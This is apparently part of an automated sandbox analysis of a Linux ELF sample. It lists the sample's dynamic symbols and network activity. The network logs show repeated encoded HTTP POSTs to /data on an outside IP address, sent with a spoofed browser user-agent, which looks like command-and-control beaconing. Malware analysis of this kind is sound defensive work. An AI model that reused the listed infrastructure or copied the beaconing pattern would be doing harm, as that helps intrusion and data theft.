                                                                          DT_PLTRELSZbytes13920x2
                                                                          DT_PLTRELpltrelDT_RELA0x14
                                                                          DT_JMPRELvalue0x400e180x17
                                                                          DT_RELAvalue0x400dd00x7
                                                                          DT_RELASZbytes720x8
                                                                          DT_RELAENTbytes240x9
                                                                          DT_VERNEEDvalue0x400d600x6ffffffe
                                                                          DT_VERNEEDNUMvalue30x6fffffff
                                                                          DT_VERSYMvalue0x400cd80x6ffffff0
                                                                          DT_NULLvalue0x00x0
                                                                          NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                          .dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                          RunMain.dynsym0xc2ea7060FUNC<unknown>DEFAULT13
                                                                          __errno_locationGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          __gmon_start__.dynsym0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                          __libc_start_mainGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          __res_searchGLIBC_2.2.5libresolv.so.2.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          _cgo_panic.dynsym0x4b4be045FUNC<unknown>DEFAULT13
                                                                          _cgo_topofstack.dynsym0x469e2025FUNC<unknown>DEFAULT13
                                                                          abortGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          crosscall2.dynsym0x4b4c60104FUNC<unknown>DEFAULT13
                                                                          fprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          fputcGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          freeGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          freeaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          fwriteGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          gai_strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getaddrinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          geteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getgrgid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getgrnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getgrouplistGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getnameinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getpwnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getpwuid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          getuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          mallocGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          mmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          munmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          nanosleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_attr_destroyGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_attr_getstackGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_attr_getstacksizeGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_attr_initGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_cond_broadcastGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_cond_waitGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_detachGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_getattr_npGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_key_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_mutex_lockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_mutex_unlockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_selfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_setspecificGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          pthread_sigmaskGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          seteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setgroupsGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setregidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setresgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setresuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setreuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          setuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          sigactionGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          sigaddsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          sigemptysetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          sigfillsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          sigismemberGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          stderrGLIBC_2.2.5libc.so.6.dynsym0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                                                                          strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          sysconfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          unsetenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                                                          vfprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF

                                                                          Download Network PCAP: filteredfull

                                                                          • Total Packets: 40
                                                                          • 443 (HTTPS)
                                                                          • 80 (HTTP)
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Mar 18, 2025 09:04:48.313309908 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 18, 2025 09:04:48.313457966 CET33606443192.168.2.2354.171.230.55
                                                                          Mar 18, 2025 09:04:48.318191051 CET4433360654.171.230.55192.168.2.23
                                                                          Mar 18, 2025 09:04:49.580998898 CET5956680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:49.586298943 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:49.586385965 CET5956680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:49.587775946 CET5956680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:49.593986988 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:49.594501972 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:49.966759920 CET43928443192.168.2.2391.189.91.42
                                                                          Mar 18, 2025 09:04:50.218208075 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.218230963 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.218245983 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.218261003 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.218499899 CET5956680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.218544006 CET5956680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.218544006 CET5956680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.219935894 CET5956680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.224651098 CET8059566164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.228547096 CET5956880192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.233244896 CET8059568164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.233345032 CET5956880192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.235686064 CET5956880192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.240474939 CET8059568164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.969336033 CET8059568164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.969373941 CET8059568164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.969492912 CET5956880192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.971259117 CET5956880192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.973351955 CET5957080192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.975904942 CET8059568164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.978085041 CET8059570164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:50.978219986 CET5957080192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.979954004 CET5957080192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:50.984605074 CET8059570164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:51.580171108 CET8059570164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:51.580189943 CET8059570164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:51.580349922 CET5957080192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:51.582547903 CET5957080192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:04:51.587765932 CET8059570164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:04:55.341927052 CET42836443192.168.2.2391.189.91.43
                                                                          Mar 18, 2025 09:04:56.877726078 CET4251680192.168.2.23109.202.202.202
                                                                          Mar 18, 2025 09:05:01.589090109 CET5957280192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:01.593878984 CET8059572164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:01.594017982 CET5957280192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:01.595354080 CET5957280192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:01.599972963 CET8059572164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:02.213525057 CET8059572164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:02.213546038 CET8059572164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:02.213726044 CET5957280192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:02.216321945 CET5957280192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:02.221812963 CET8059572164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:10.443821907 CET43928443192.168.2.2391.189.91.42
                                                                          Mar 18, 2025 09:05:12.216399908 CET5957480192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:12.221323967 CET8059574164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:12.221410036 CET5957480192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:12.223552942 CET5957480192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:12.228328943 CET8059574164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:12.828819036 CET8059574164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:12.828844070 CET8059574164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:12.828944921 CET5957480192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:12.830789089 CET5957480192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:12.837707043 CET8059574164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:22.730101109 CET42836443192.168.2.2391.189.91.43
                                                                          Mar 18, 2025 09:05:22.830648899 CET5957680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:22.835354090 CET8059576164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:22.835450888 CET5957680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:22.837496996 CET5957680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:22.842189074 CET8059576164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:23.459464073 CET8059576164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:23.459481955 CET8059576164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:23.459598064 CET5957680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:23.461735964 CET5957680192.168.2.23164.92.211.176
                                                                          Mar 18, 2025 09:05:23.466579914 CET8059576164.92.211.176192.168.2.23
                                                                          Mar 18, 2025 09:05:26.825618029 CET4251680192.168.2.23109.202.202.202
                                                                          Mar 18, 2025 09:05:51.398267031 CET43928443192.168.2.2391.189.91.42
                                                                          • 164.92.211.176
                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          0192.168.2.2359566164.92.211.17680
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 18, 2025 09:04:49.587775946 CET1804OUTPOST /data HTTP/1.1
                                                                          Host: 164.92.211.176
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Length: 1608
                                                                          Accept-Encoding: gzip
                                                                          Connection: close
                                                                          Data Raw: 59 32 4e 68 4d 54 41 32 4e 6a 51 74 4e 47 51 78 5a 53 30 30 4d 7a 49 79 4c 54 67 77 59 57 45 74 4e 44 5a 6c 59 57 5a 6a 4d 7a 45 33 5a 54 67 35 61 66 32 4d 48 4c 79 64 2b 50 53 4a 56 42 42 76 57 4c 4a 35 63 2f 37 30 64 36 5a 7a 64 41 51 57 78 36 7a 6c 43 4e 57 73 56 53 73 34 69 46 6e 76 56 73 44 37 62 49 37 46 58 4e 4f 36 36 68 64 2f 56 6b 44 73 5a 42 74 52 49 76 5a 4f 38 59 56 41 78 6f 52 34 36 4d 75 6f 59 76 70 2f 6e 61 79 56 59 68 6a 6b 67 43 30 49 4b 64 36 42 68 6d 36 57 73 4e 62 74 37 58 43 4c 7a 72 5a 37 41 4e 68 4c 76 4d 39 44 67 6b 34 4a 6f 55 46 46 38 59 75 6a 2b 36 5a 56 56 54 4a 35 73 65 6b 2b 36 66 53 42 6e 73 30 52 70 36 59 4b 70 62 56 63 66 41 63 6e 33 38 64 49 75 42 39 4d 34 52 68 52 2f 44 63 37 64 6e 6b 68 57 2f 69 45 54 30 45 75 2b 56 54 57 72 75 67 71 71 41 66 67 47 43 46 46 77 4e 67 78 74 6b 54 4e 61 61 31 62 62 65 2b 6d 4a 32 63 71 6c 41 58 54 63 35 62 34 42 31 47 4f 2b 75 53 63 36 70 69 7a 6d 31 65 4a 76 4e 56 72 55 69 41 4a 35 64 51 69 74 6a 4e 4d 63 51 68 30 47 51 75 64 76 74 [TRUNCATED]
                                                                          Data Ascii: Y2NhMTA2NjQtNGQxZS00MzIyLTgwYWEtNDZlYWZjMzE3ZTg5af2MHLyd+PSJVBBvWLJ5c/70d6ZzdAQWx6zlCNWsVSs4iFnvVsD7bI7FXNO66hd/VkDsZBtRIvZO8YVAxoR46MuoYvp/nayVYhjkgC0IKd6Bhm6WsNbt7XCLzrZ7ANhLvM9Dgk4JoUFF8Yuj+6ZVVTJ5sek+6fSBns0Rp6YKpbVcfAcn38dIuB9M4RhR/Dc7dnkhW/iET0Eu+VTWrugqqAfgGCFFwNgxtkTNaa1bbe+mJ2cqlAXTc5b4B1GO+uSc6pizm1eJvNVrUiAJ5dQitjNMcQh0GQudvtYC2UzZI3ctjEn+zFwVUHijhYlA7GzGmfDMJacTPcR6uaa31Ym9hKCnSs1p8V0GKiRMmtVFRMmDoIcWVLYIB5J+Ny9pe0H2PG8OS0E13AB0ai1m0fg2hbVH9lSMEeBz9IWDNnMi6UJSWEX6bxMIKTjwWCoZbkXTj0cTcO5HfgkT491MVwjekPklDyogV+WNb8aVsVkOdpmf/XCW6FFIysvwnNvra9LW8j+aEZNaxBV7hB17+A65c6ovryMiXc+d0uJVfQ6SNYZvUEVid7OEZB5OhAR9EOL62PzaA7tBh5Z2pipDBdgsmCdHJSOqoGOJ/ZVRmtIFIBmQDN0jmgtQ596ySmsH94mChOKkJFMyA/9YCxEElUoJka9y0RvI76BfXDTRFCKg1VxaPiBFrjP+spLOLkfEL1DrLiv4Frchvho7n5F+CeQV6OUSmESrCpub9ABVHfFTTeAUgBki4vSoIJfvkNElsGUucX6sKUFoybKUw/dOiwy178I89oC5l9oDtFRWhmm4mvSYigaWSmjeEp3cMldw7Sab9SIZ8E4lASwcf9GMbky0hgpaSBLjspwld+/Wxvf7gQ242sxQAKeGzlpRIB4QHbm1pOLiab3XL6a6AeVmX1fxL76gvfMVqvU5P8s6DJ0R2oiJckI64rZXyDcSPMxfCjdlDIbR [TRUNCATED]
                                                                          Mar 18, 2025 09:04:50.218208075 CET1236INHTTP/1.1 200 OK
                                                                          Cache-Control: max-age=0, no-cache
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Content-Type: application/octet-stream
                                                                          Date: Tue, 18 Mar 2025 08:04:50 GMT
                                                                          Pragma: no-cache
                                                                          Server: NetDNA-cache/2.2
                                                                          Connection: close
                                                                          Transfer-Encoding: chunked
                                                                          Data Raw: 61 33 30 0d 0a 59 32 4e 68 4d 54 41 32 4e 6a 51 74 4e 47 51 78 5a 53 30 30 4d 7a 49 79 4c 54 67 77 59 57 45 74 4e 44 5a 6c 59 57 5a 6a 4d 7a 45 33 5a 54 67 35 4f 48 4d 6b 75 65 61 34 6a 66 70 72 45 6f 78 59 59 75 53 6b 4a 74 68 54 2f 4d 57 67 64 31 7a 34 46 33 49 39 47 77 41 44 58 43 41 76 77 43 6c 6c 75 69 44 34 52 79 46 78 68 53 2f 68 36 31 36 79 32 32 4c 2b 59 6e 53 64 4e 47 4c 42 51 74 39 30 74 42 37 4c 72 6f 35 53 42 4c 33 57 59 72 4c 79 6d 45 43 41 41 6a 4c 79 58 39 78 4b 4e 39 62 75 44 6d 45 44 63 76 53 47 65 73 32 78 46 44 69 44 63 45 65 71 4b 43 39 46 48 61 67 67 33 4a 48 52 6b 7a 5a 46 5a 36 75 35 78 68 4b 70 64 34 4c 31 6b 4c 6e 69 48 6d 32 37 67 74 7a 59 4f 54 44 78 44 55 50 71 51 7a 4d 4c 41 61 75 31 43 63 41 48 2f 7a 51 63 55 59 75 43 35 73 72 35 7a 69 48 67 76 54 64 4d 45 5a 46 7a 48 75 65 4d 65 73 46 50 2f 33 62 49 66 57 39 46 47 33 67 41 35 73 70 56 62 6e 79 45 30 72 4b 36 51 30 5a 43 6c 35 47 31 47 4d 44 68 4e 75 78 56 49 31 52 49 55 5a 63 45 71 79 56 72 64 36 73 53 34 63 42 45 35 [TRUNCATED]
                                                                          Data Ascii: a30Y2NhMTA2NjQtNGQxZS00MzIyLTgwYWEtNDZlYWZjMzE3ZTg5OHMkuea4jfprEoxYYuSkJthT/MWgd1z4F3I9GwADXCAvwClluiD4RyFxhS/h616y22L+YnSdNGLBQt90tB7Lro5SBL3WYrLymECAAjLyX9xKN9buDmEDcvSGes2xFDiDcEeqKC9FHagg3JHRkzZFZ6u5xhKpd4L1kLniHm27gtzYOTDxDUPqQzMLAau1CcAH/zQcUYuC5sr5ziHgvTdMEZFzHueMesFP/3bIfW9FG3gA5spVbnyE0rK6Q0ZCl5G1GMDhNuxVI1RIUZcEqyVrd6sS4cBE5opAY7rcmeIFVEXEDJkon/F6DcV9KMhpIJTd2g8kgQR/J3WiQnT1ZCITD5MyAdigGAs7yYExrasYjEjkF+hLSTadahICYaAGKdkHnc5fKgSyyOyGiS/Vaavql7lwOM0k6xNJOKN4g7Pi+x5cGI1OQESLs8SHd8+tnitVoD8qjFGeKUNCN7gPzOlqlvI5zpDs5BjHLUC6id9UWzO6pm65OEMXBvKdIfggROPEiFI4e0QS3jtXWpoq5rwu9EEh7JmCX/qaN3/wiFdcPahFXTy1w41SgUwHxNRJzJV/CxXrZcWwqnkB+TthdqQyabZK3RlFiVI11b1JqmuxlFEccqGzpvC+rA8ohKEwinquNVh7Te9TQYX7b9fd2Aupq7Ec9CoFuyLOnJytlCoOjixzQYWtpnSPTIlxNgFysAyI1hovDpu/8Led/ZmOENqkc9+VzCMGxhno5Gsn0gcYyZhA9D6lNp7pTgLKkCPC9r64MB4IUSDqvgXNBg+LpT9rUlPuhfl3dJvxNffdP03koK/whlqgkSMtedj5/xueZmn4aWxyMP3j0vly9Vrfn3IVy2R/VQ6qtKbvqt23ZF9FhfUFn/knKG5ZGiyfDaPIu/b
                                                                          Mar 18, 2025 09:04:50.218230963 CET1236INData Raw: 64 67 46 51 74 44 59 75 6b 55 68 35 6a 46 55 64 39 41 69 74 32 66 74 69 47 4a 53 44 70 31 5a 44 45 76 58 74 2f 41 67 72 54 74 62 35 5a 72 38 78 36 5a 57 55 66 2f 70 45 6e 70 44 58 57 39 2b 2b 46 54 57 63 75 48 37 66 4f 6e 6e 55 49 49 63 55 4d 76
                                                                          Data Ascii: dgFQtDYukUh5jFUd9Ait2ftiGJSDp1ZDEvXt/AgrTtb5Zr8x6ZWUf/pEnpDXW9++FTWcuH7fOnnUIIcUMvW7S3ZMsM6Xy5PeGl1vT07Wh6PBPhYUT9aO2drkaEj2wGDw2Q93OZpL2oL/dFIPR3RV+sS8XKmo8szBDu6j2iHzrVj31hscbx/HQJw8jpiAlJbu7voXOwSBcExLo3kLyJccCRdNSmsH5NA9w07H0B/jWf6qwxsWIQ4
                                                                          Mar 18, 2025 09:04:50.218245983 CET460INData Raw: 50 42 70 49 51 41 46 2b 54 79 33 49 30 51 53 2b 58 31 58 79 43 63 37 55 4c 6f 4c 4b 67 73 42 65 63 77 71 36 76 51 79 49 36 50 6b 38 34 78 2f 5a 42 50 38 67 6c 57 79 33 33 53 64 76 55 39 71 6d 68 68 48 56 39 2f 36 69 71 64 39 68 69 76 50 48 72 4e
                                                                          Data Ascii: PBpIQAF+Ty3I0QS+X1XyCc7ULoLKgsBecwq6vQyI6Pk84x/ZBP8glWy33SdvU9qmhhHV9/6iqd9hivPHrNzAx5hBneR8E2fKQeCI1v/7dsZozy6mEJjB35RD80KL98Hf+eAhu/bQbAoUcwYWaeArScjIwS9g0cPrTfzpUo885dIKOK5gdhbBNMCdW83QcfvdC+v0XancVl6zfGO2VvbSpMdn0sNjcZQPgjgeYlv3EeDMyxBdWu7


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          1192.168.2.2359568164.92.211.17680
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 18, 2025 09:04:50.235686064 CET971OUTPOST /data HTTP/1.1
                                                                          Host: 164.92.211.176
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Length: 776
                                                                          Accept-Encoding: gzip
                                                                          Connection: close
                                                                          Data Raw: 5a 6a 45 77 4e 47 49 33 59 6d 59 74 59 7a 63 33 59 79 30 30 4e 32 4d 78 4c 57 45 34 5a 57 59 74 4f 54 41 33 4d 54 4a 6c 4d 32 59 30 4e 44 67 32 42 30 4e 71 6e 73 73 63 50 2f 31 46 76 36 2b 67 64 44 42 66 75 51 30 37 53 30 68 52 32 68 58 57 53 51 6d 50 5a 79 7a 78 7a 63 72 54 78 48 78 78 74 68 63 57 71 39 30 56 79 74 48 46 59 4c 48 4e 63 42 63 42 4c 55 30 54 47 66 30 58 2b 4f 6b 46 42 2b 50 53 45 73 2f 2b 55 59 64 49 49 49 56 51 36 6b 71 39 75 73 37 44 6b 31 46 67 50 77 6a 32 35 39 44 36 4f 6a 54 39 53 31 36 31 69 6e 54 75 4d 42 38 38 56 73 4e 68 66 70 79 76 6f 37 6b 6c 43 30 4c 56 51 55 69 62 41 69 32 36 50 2b 58 31 47 5a 34 45 4e 79 4d 55 54 79 53 33 53 7a 47 49 70 6e 73 39 66 6d 43 5a 39 30 58 75 50 44 50 41 68 51 44 43 61 42 48 47 38 68 72 39 4b 58 58 57 75 6d 52 46 6e 2b 72 46 64 33 76 45 38 58 36 38 31 2f 45 66 50 6e 63 47 72 43 45 52 2f 4e 2f 50 4f 4a 31 55 4e 63 75 30 46 4a 61 53 4a 65 38 6e 32 57 31 7a 31 70 7a 57 4b 7a 4a 4a 63 79 72 68 2b 59 6c 57 52 4f 4d 45 7a 68 64 6d 75 72 58 7a 73 53 [TRUNCATED]
                                                                          Data Ascii: ZjEwNGI3YmYtYzc3Yy00N2MxLWE4ZWYtOTA3MTJlM2Y0NDg2B0NqnsscP/1Fv6+gdDBfuQ07S0hR2hXWSQmPZyzxzcrTxHxxthcWq90VytHFYLHNcBcBLU0TGf0X+OkFB+PSEs/+UYdIIIVQ6kq9us7Dk1FgPwj259D6OjT9S161inTuMB88VsNhfpyvo7klC0LVQUibAi26P+X1GZ4ENyMUTyS3SzGIpns9fmCZ90XuPDPAhQDCaBHG8hr9KXXWumRFn+rFd3vE8X681/EfPncGrCER/N/POJ1UNcu0FJaSJe8n2W1z1pzWKzJJcyrh+YlWROMEzhdmurXzsS7FBqRBia92hdv3w+/a02NQ8Gg9A82jbPjq2vDrnjD89KUXU2POGbwpEVTr4ByMhpy7aOf7xXmh14ya7IRgkyVYQFhcM0XWAFLh6oObSYL5KPSGG0tSfKN/CGP49Lw6njzDD5yW61VOxrV+MgO+v7WIEpTpnsbFMBLI3U+JMdmrn/iTbMm5U5Hy6jJhs1SqUKsVrXwqLO3/9VwNVnK948GkId2WIJFn4JySWYo0dnm3WuAJbTQly+RndUmrRhvEv95pu1NrkEjGOVFP9esr8BdOJ6CteF7DhlcRanZMDxglMZ03ZRTrv3ogffT3O0rG8khjQZ+4hW59kPrpP8Y6E1wZUDAHzReVhzALJqfU4WiWgwUObeaJlAKA1RV4Z9JHuHsPoATW5hQU0X6JcG/dcMXJjc+Du5rksH/Py7ONXmyqDueQp1S7kA==
                                                                          Mar 18, 2025 09:04:50.969336033 CET521INHTTP/1.1 200 OK
                                                                          Cache-Control: max-age=0, no-cache
                                                                          Content-Length: 240
                                                                          Content-Type: application/javascript; charset=utf-8
                                                                          Content-Type: application/octet-stream
                                                                          Date: Tue, 18 Mar 2025 08:04:50 GMT
                                                                          Pragma: no-cache
                                                                          Server: NetDNA-cache/2.2
                                                                          Connection: close
